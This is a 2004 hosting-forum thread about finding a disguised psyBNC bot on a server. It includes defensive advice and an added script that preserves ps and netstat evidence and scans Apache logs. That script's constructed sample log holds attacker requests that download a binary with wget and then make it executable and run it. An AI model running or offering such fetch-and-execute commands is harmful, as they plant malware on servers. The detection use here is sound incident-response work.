Web Hosting Talk

View Full Version : found psyBNC in my server under 1 acc


Adwis
04-16-2004, 02:25 AM
What should I do?
And I can't go to that directory.

What should I do?

quote:
--------------------------------------------------------------------------------
gorgole was running [psyBNC] the process claimed to be [sendmail: accepting connections ? c-leet]
The binary is located at: /var/tmp/.../vi

rghf
04-16-2004, 02:39 AM
Kick the user, delete the account, and check if the server has been compromised.

Rus

Steven
04-16-2004, 02:42 AM
/var/tmp/.../vi

That doesn't look too good. Do you have an old kernel on the box? Have you secured the server any? Do you get anything when you run:


for files in /usr/local/apache/domlogs/*; do grep "wget" "$files"; done;

Adwis
04-16-2004, 03:05 AM
I don't know how to delete & clean this problem.
Do you have any step-by-step instructions, please?

Steven
04-16-2004, 03:11 AM
Well, unfortunately it's not a step-by-step thing. You could be rooted and have a backdoor, or it could be simple and just as a user. But in any case you should set up some measures to help prevent this in the future.

It can be as simple as rm -rf /var/tmp/.../ BUT I seriously suggest you hire someone to check it out before you remove the files so they can evaluate what's going on. There are many companies out there that can do this.

serverwizards
easyservermanagement
wemanageservers
rackaid
etc

huck
04-16-2004, 06:26 PM
Do not just remove the files!!! Those files are clues to who placed the bot on your system and when. If you must stop the bot immediately, dump netstat and ps screens to a text file. They can all be very useful in diagnosing who put the file on your system and when it was started. Also, hackers like to call files one thing when they actually do another.

In this situation, you should verify the integrity of netstat and check for unusual ports. An external portscan would be useful as well in case there are modules altering the netstat results.

If the owner of the file is apache or root, then you may have been hacked. Tools like chkrootkit and rkhunter can be helpful but do not substitute for a thorough security scan.
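The two checks suggested above (snapshot ps/netstat before deleting anything, then grep the per-domain Apache logs for wget) as one added shell script; this is example code, not from anyone in the thread. The evidence directory, the /usr/local/apache/domlogs path and the sample log lines are assumptions/constructed.

```shell
#!/bin/sh
# Added example (not from the thread). Step 1 preserves volatile state before
# anything is cleaned up; step 2 scans domlogs for requests that ran a download
# tool, which is usually how a bot binary lands in /var/tmp. Paths are assumptions.

# Write timestamped ps/netstat/ss snapshots into an evidence directory.
# Every tool is optional: netstat may be absent, or trojaned on a rooted box,
# so keep more than one view. Echoes the number of snapshot files written.
snapshot_evidence() {
    dir="$1"; ts=$(date +%Y%m%d-%H%M%S)
    mkdir -p "$dir" || return 1
    ps auxww > "$dir/ps-$ts.txt" 2>/dev/null || :
    netstat -anp > "$dir/netstat-$ts.txt" 2>/dev/null || :
    ss -anp > "$dir/ss-$ts.txt" 2>/dev/null || :
    set -- "$dir"/*
    echo $#
}

# Grep every domlog for a download tool (or chmod) followed by a separator:
# a raw space, %20 or +. That targets command execution through a script
# (cmd=wget%20http://...) rather than a harmless "Wget/1.9" user-agent line.
# -H prints file:line so each hit maps to a vhost, timestamp and source IP.
find_download_hits() {
    logdir="$1"
    grep -HiE '(wget|curl|fetch|lynx|chmod)(%20|[+ ])' "$logdir"/* 2>/dev/null || :
}

# Constructed sample domlog (not a real capture) so the scan can be tried offline.
# Lines 2 and 3 are hits; line 4 is a legitimate crawler and must not match.
make_sample_domlog() {
    logdir="$1"; mkdir -p "$logdir"
    cat > "$logdir/example.com" <<'EOF'
203.0.113.9 - - [16/Apr/2004:01:12:03 -0500] "GET /index.php HTTP/1.1" 200 1234 "-" "Mozilla/4.0"
203.0.113.9 - - [16/Apr/2004:01:13:44 -0500] "GET /up.php?cmd=wget%20http://198.51.100.7/vi HTTP/1.1" 200 51 "-" "Mozilla/4.0"
203.0.113.9 - - [16/Apr/2004:01:13:59 -0500] "GET /up.php?cmd=cd+/var/tmp/...;chmod+755+vi;./vi HTTP/1.1" 200 51 "-" "Mozilla/4.0"
198.51.100.2 - - [16/Apr/2004:02:00:00 -0500] "GET /robots.txt HTTP/1.0" 200 40 "-" "Wget/1.9"
EOF
}

# Usage on a real box (as root), in this order:
#   snapshot_evidence /root/evidence && find_download_hits /usr/local/apache/domlogs
```

A hit gives the timestamp and source address to pivot on in the rest of the logs; the script never deletes anything.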

Steven
04-16-2004, 06:41 PM
Huck, it depends on the control panel as to what the file will be owned by; for example, cPanel's Apache runs as the user nobody. :)

huck
04-16-2004, 07:03 PM
Yeah, I know that. I should have been more specific and said owned by Apache's user ID or group ID. I was speaking of Apache in a generic sense. I've seen many different UIDs for Apache including but not limited to:
apache
httpd
http
httpdssl
httpds
admserv
server
and a few more......

boonchuan
04-17-2004, 10:33 AM
I suggest just reformatting and reinstalling to be 100% safe; you won't know if you have backdoors.